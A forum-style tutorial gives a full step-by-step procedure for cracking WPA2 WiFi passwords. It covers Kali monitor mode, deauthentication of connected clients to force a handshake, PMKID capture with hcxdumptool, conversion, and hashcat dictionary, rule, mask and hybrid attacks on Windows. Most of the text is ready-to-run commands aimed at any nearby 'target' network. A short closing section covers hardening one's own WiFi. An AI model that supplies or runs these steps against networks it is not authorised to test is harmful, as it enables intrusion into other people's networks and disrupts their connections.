πŸ”“ Crack Any WPA2 WiFi Password on Windows β€” Full Step-by-Step Guide

:high_voltage: Capture the Handshake, Feed It to Your GPU, Watch It Crack

Capture the handshake. Feed it to your GPU. Watch 5 million guesses per second do the rest.

Most home WiFi passwords live inside a 14-million-word list that’s been public since 2009. This tutorial shows you exactly how that works.

WPA2-PSK protects 90% of home networks. It’s crackable with a $30 adapter, hashcat, and a wordlist. Every cracking step runs natively on Windows.


🧠 How WPA2 Cracking Actually Works β€” Plain English

Think of your WiFi password as a secret handshake between your phone and your router. Every time a device connects, they exchange an encrypted conversation called a 4-way handshake to prove they both know the password.

That handshake travels through the air as radio waves. Anyone with the right antenna can capture it. They can’t read the password directly β€” it’s encrypted β€” but they can take that encrypted blob offline and throw millions of guesses at it until one matches.

That’s what hashcat does. It takes the captured handshake, runs your GPU at full blast, and tests millions of passwords per second against it. If the password exists in a common wordlist like rockyou.txt β€” 14 million leaked real passwords β€” it cracks in seconds.

Concept What It Means
4-way handshake Encrypted proof that a device knows the WiFi password β€” captured over the air
Hashcat GPU-powered tool that tests millions of password guesses per second against a captured handshake
Wordlist (rockyou.txt) 14 million+ real passwords leaked from breaches β€” covers ~70% of home WiFi passwords
Monitor mode Special adapter mode that listens to ALL wireless traffic, not just your network
Deauthentication Sending a disconnect signal to force a device to reconnect β€” triggering a fresh handshake

:high_voltage: Pro tip: There’s also a newer attack called PMKID that grabs a hash directly from the router without needing any connected clients. Faster and cleaner β€” covered in the advanced section below.

βš™οΈ What You Need β€” Hardware & Software
Component What It Does Where to Get It
WiFi adapter with monitor mode Built-in WiFi cards can’t capture raw packets β€” you need an external adapter that supports monitor mode + packet injection Alfa AWUS036ACH β€” most recommended. Any Realtek RTL8812AU or Atheros chipset works.
Kali Linux (bootable USB) The capture phase needs Linux tools. Boot from USB, capture, reboot to Windows. kali.org/get-kali
Hashcat (Windows native) GPU-accelerated password cracker. Runs natively on Windows β€” no Linux needed for cracking. hashcat.net/hashcat
rockyou.txt wordlist 14 million+ real leaked passwords Included in Kali at /usr/share/wordlists/rockyou.txt.gz β€” copy to USB
hcxtools / cap2hashcat Converts .cap capture files to hashcat’s .hc22000 format Online converter (no install) or GitHub - hcxtools Windows

The Windows workflow in 3 stages:

  1. :satellite_antenna: Capture β€” Boot Kali from USB β†’ capture handshake β†’ save .cap file to USB stick (~5 min)
  2. :counterclockwise_arrows_button: Convert β€” Back on Windows β†’ upload .cap to hashcat.net/cap2hashcat β†’ download .hc22000 file
  3. :fire: Crack β€” Run hashcat on Windows with your GPU β†’ password appears

Linux time: 5 minutes total. Everything else is Windows.

πŸ“‘ Step 1: Capture the Handshake (Kali USB)

Boot into Kali Linux from your USB drive. Plug in your external WiFi adapter.

1.1 β€” Verify your adapter is detected:

lsusb

You should see your Alfa (or similar) adapter listed.

1.2 β€” Enable monitor mode:

airmon-ng start wlan0

Your adapter is now wlan0mon β€” it listens to all wireless traffic in range.

1.3 β€” Scan for networks:

airodump-ng wlan0mon

This displays every WiFi network nearby:

Column What It Shows
BSSID Router’s MAC address (you need this)
CH Channel number (you need this)
ENC Encryption type β€” look for WPA2
ESSID Network name
STATION Connected client devices (you need one of these)

Note down the BSSID, channel, and one client MAC address of your target network.

1.4 β€” Focus on the target and start recording:

airodump-ng -c [CHANNEL] --bssid [TARGET_BSSID] -w capture wlan0mon

This locks onto one network and saves all traffic to capture-01.cap.

1.5 β€” Force a handshake (deauthentication):

Open a second terminal:

aireplay-ng -0 5 -a [TARGET_BSSID] -c [CLIENT_MAC] wlan0mon

This sends 5 disconnect packets to the client device. It drops off the network for a split second, reconnects automatically, and sends a fresh handshake through the air β€” which your adapter captures.

1.6 β€” Confirm the handshake:

Watch the top-right of your airodump-ng window. When you see:

WPA handshake: [MAC_ADDRESS]

You have what you need. Press Ctrl+C to stop.

1.7 β€” Copy files to USB:

cp capture-01.cap /media/[YOUR_USB_DRIVE]/
cp /usr/share/wordlists/rockyou.txt.gz /media/[YOUR_USB_DRIVE]/

Reboot into Windows.

πŸ”„ Step 2: Convert the Capture File (Windows)

Hashcat needs .hc22000 format β€” not raw .cap. Two ways to convert:

Option A β€” Online converter (easiest, no install):

  1. Go to hashcat.net/cap2hashcat
  2. Upload your capture-01.cap file
  3. Download the converted .hc22000 file

Option B β€” hcxpcapngtool locally (Windows binary):

Download pre-compiled Windows binaries from hcxtools-windows on GitHub, then:

hcxpcapngtool.exe -o hash.hc22000 capture-01.cap

Either way, you now have a hash.hc22000 file ready for cracking.

πŸ”₯ Step 3: Crack the Password (Hashcat on Windows)

Extract hashcat to a folder. Open Command Prompt or PowerShell. Decompress rockyou if needed:

gzip -d rockyou.txt.gz

Or use 7-Zip to extract it.

3.1 β€” Basic dictionary attack:

hashcat.exe -m 22000 hash.hc22000 rockyou.txt
Flag What It Does
-m 22000 WPA-PBKDF2-PMKID+EAPOL hash mode (modern WPA2)
hash.hc22000 Your converted capture file
rockyou.txt 14 million passwords to try

If the password is in the wordlist β€” it cracks in seconds to minutes depending on your GPU.

3.2 β€” Dictionary + rules (smarter mutations):

hashcat.exe -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule

This takes every word in the list and mutates it β€” adding numbers, capitalizing, appending years, reversing letters. Catches passwords like Fluffy2024! that aren’t in the raw wordlist.

3.3 β€” Brute-force digits only (phone numbers, PINs):

hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 12 ?d?d?d?d?d?d?d?d?d?d?d?d

Tests every possible combination of 8-12 digit numbers. Catches numeric-only passwords.

3.4 β€” Hybrid: wordlist + digits appended:

hashcat.exe -m 22000 hash.hc22000 -a 6 rockyou.txt ?d?d?d?d

Tests every word with 4 digits appended β€” catches patterns like monkey1234, dragon2025.

3.5 β€” Check results:

hashcat.exe -m 22000 hash.hc22000 --show

:high_voltage: Performance tips:

Flag Effect
-w 3 Maximum GPU workload (PC becomes unresponsive β€” fastest cracking)
-O Optimized kernels for passwords ≀15 characters (significant speed boost)
--force Override warnings (use if hashcat complains about drivers)

Expected speeds by GPU:

GPU Approx. Speed
GTX 1060 ~100K H/s
RTX 3070 ~500K H/s
RTX 3090 ~800K H/s
RTX 4090 ~1.2M H/s
⚑ Advanced: PMKID Attack (No Clients Needed)

The classic method above requires a connected device to deauthenticate. The PMKID attack skips that entirely β€” it grabs a hash directly from the router.

Many routers cache a PMKID (Pairwise Master Key Identifier) for roaming. You can request it without any clients being connected.

In Kali:

# Stop interfering services
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

# Capture PMKIDs (runs for 60 seconds)
sudo hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=15

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

Back on Windows β€” crack the same way:

hashcat.exe -m 22000 hash.hc22000 rockyou.txt
Classic Handshake PMKID
Needs a connected client No clients needed
Requires deauth + reconnect Requests hash directly from router
Can fail if no devices are online Works on any vulnerable router
Captures 4-way handshake Captures PMKID from first handshake message

Not every router is vulnerable to PMKID β€” but many are. Try it first. Fall back to classic deauth if it doesn’t work.

πŸ›‘οΈ How to Make YOUR WiFi Uncrackable

Everything above stops working the moment you fix your password.

Fix Why It Works
15+ character random passphrase correct-horse-battery-staple takes centuries. fluffy2024 takes seconds. Length wins.
Avoid dictionary words entirely If it’s in rockyou.txt β€” cracked before your GPU warms up
Enable WPA3 (if router supports it) WPA3 uses SAE β€” immune to offline dictionary attacks entirely
Disable WPS WPS PIN can be brute-forced in hours. It’s a backdoor most people forget exists.
Use a random password generator openssl rand -base64 20 or any password manager. No wordlist will ever contain it.
Check connected devices regularly Router admin panel β†’ Attached Devices. Unknown MACs = someone’s already in.

The real lesson: WPA2 isn’t broken β€” weak passwords are. A truly random 20-character password makes this entire tutorial useless. That’s the point.

πŸ› οΈ All Tools & Resources
Tool What It Does Link
Hashcat GPU password cracker (Windows native) hashcat.net
Aircrack-ng Monitor mode, scanning, deauth, capture aircrack-ng.org
hcxdumptool PMKID + handshake capture tool GitHub
hcxtools Convert captures to hashcat format GitHub
hcxtools Windows Pre-compiled Windows binaries GitHub
cap2hashcat online Convert without installing anything hashcat.net/cap2hashcat
Hashcat WPA2 wiki Official cracking documentation hashcat.net wiki
Kali Linux Penetration testing OS (USB bootable) kali.org
Alfa AWUS036ACH Most recommended monitor-mode adapter alfa.com.tw

:high_voltage: Quick Hits

Want Do
:satellite_antenna: Capture handshake β†’ Kali USB β†’ airmon-ng β†’ airodump-ng β†’ aireplay-ng
:satellite_antenna: Capture PMKID (no clients) β†’ Kali β†’ hcxdumptool β†’ hcxpcapngtool
:counterclockwise_arrows_button: Convert for hashcat β†’ hashcat.net/cap2hashcat
:fire: Crack on Windows β†’ hashcat.exe -m 22000 hash.hc22000 rockyou.txt
:shield: Protect your WiFi β†’ 15+ char random passphrase + WPA3 + disable WPS

Test your own network. Fix your own password. Don’t be the one running β€œpassword123” in 2026.

9 Likes